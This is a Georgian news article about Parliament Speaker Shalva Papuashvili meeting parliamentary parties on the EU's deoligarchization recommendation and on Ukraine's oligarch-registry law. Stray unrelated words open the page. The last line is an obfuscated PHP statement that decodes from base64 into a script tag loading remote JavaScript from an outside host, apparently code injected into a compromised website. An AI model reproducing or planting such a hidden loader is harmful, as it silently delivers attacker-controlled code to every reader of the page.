celsiusi
ავერსი შნაიდერი

პარლამენტის თავმჯდომარე შალვა პაპუაშვილი ევროკავშირის მიერ დადგენილი 12 პუნქტიდან მე-5 პუნქტის – დეოლიგარქიზაციის შესრულების თაობაზე საპარლამენტო პოლიტიკური პარტიების წარმომადგენლებს შეხვდა.

პარლამენტის პრესსამსახურის მიერ გავრცელებუილი ინფორმაციით, შეხვედრაზე დეოლიგარქიზაციის შესახებ უკრაინაში მიღებული კანონის შესახებ მსჯელობა გაიმართა.

„დეოლიგარქიზაციის საკითხი საქართველოსთან, მოლდოვასთან და უკრაინასთან მიმართებით არის რეკომენდაციებში. უკრაინის შემთხვევაში, რეკომენდაციებში საუბარია არსებული კანონის იმპლემენტაციაზე, ვინაიდან უკრაინაში ეს კანონი მიღებულ იქნა შარშან შემოდგომაზე და მხოლოდ მიმდინარე წლის მაისში ამოქმედდა. ამიტომ, რეკომენდაცია არის იმპლემენტაცია. აქედან, ჩვენ, შეგვიძლია, დაახლოებით ვივარაუდოთ, რა შეიძლება იგულისხმებოდეს ჩვენი რეკომენდაციის შემთხვევაში. ასევე, განვიხილეთ უკრაინული კანონი, მისი პრინციპები, როგორ მოქმედებს და რა კრიტერიუმებია“, – განაცხადა შეხვედრის დასრულების შემდეგ შალვა პაპუაშვილმა.

იურიდიულ საკითხთა კომიტეტის თავმჯდომარის, ანრი ოხანაშვილის განცხადებით, ევროკომისიის მიერ უკრაინისთვის გაცემული რეკომენდაციიდან გამომდინარე ნათელია, რომ მათი სურვილია ამ კანონის იმპლემენტაცია და შესაბამისად, თუკი ევროკომისიის მიზანია უკრაინაში ამ კანონის იმპლემენტაცია, ლოგიკურია, რომ საქართველოსთან მიმართებაშიც ამ კანონის მიღებაც და იმპლემენტაციაც უნდა იყოს სწორი.

„უკრაინული მოდელი ეფუძნება ოთხ ძირითად კომპონენტს. პირველი, ეს გახლავთ პოლიტიკაში ჩარევის კომპონენტი შესაბამისი პირის მხრიდან. მეორე, ეს არის დიდი ოდენობით ფინანსური რესურსი, რომელიც გამოითვლება საარსებო მინიმუმი გამრავლებული ერთ მილიონზე. მესამე, ეს არის გავლენა მედიაზე და მეოთხე – დომინირებული მდგომარეობა ბაზარზე. ამ ოთხი კომპონენტიდან თუ სამი იქნება დაკმაყოფილებული, უკრაინული მოდელით, პირი მიჩნეული იქნება ოლიგარქად. დგება რეესტრი და ხდება ამ პირების რეესტრში შეყვანა. ამ გადაწყვეტილებას იღებს უკრაინის მთავრობა, რომელსაც საბოლოოდ აფორმებს პრეზიდენტი“, – აღნიშნა ანრი ოხანაშვილმა.

ოხანაშვილის თქმით, რადიკალური იდეების გამხმოვანებელმა პოლიტიკურმა ჯგუფებმა – „ნაციონალურმა მოძრაობამ“ და მათმა პარტნიორებმა, რომლებიც საუბრობენ დეოლიგარქიზაციის საკითხზე დღევანდელ სამუშაო შეხვედრაში მონაწილეობა არ მიიღეს, რაც არათუ ხელს უწყობს დეპოლარიზაციას, არამედ პირიქით, კიდევ უფრო ზრდის მას.

პოლიტიკური ჯგუფის „მოქალაქეების“ თავმჯდომარის, ალეკო ელისაშვილის განცხადებით, უკრაინული კანონის პირდაპირ გადმოტანა არ უნდა მოხდეს, რადგან იქ ბევრი ხარვეზი და გაურკვევლობაა.

შეხვედრაში მონაწილეობდნენ საპარლამენტო უმრავლესობის, პოლიტიკური ჯგუფების – „გირჩის“, „მოქალაქეების“ და „ევროპელი სოციალისტების“ წევრები, ასევე, უფრაქციო პარლამენტის წევრები.

დეოლიგარქიზაციის შესახებ ევროკომისიის მიერ დადგენილი რეკომენდაციის შესრულების პროცესს  პარლამენტის იურიდიულ საკითხთა კომიტეტი და კომიტეტის თავმჯდომარე უხელმძღვანელებს.

476
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");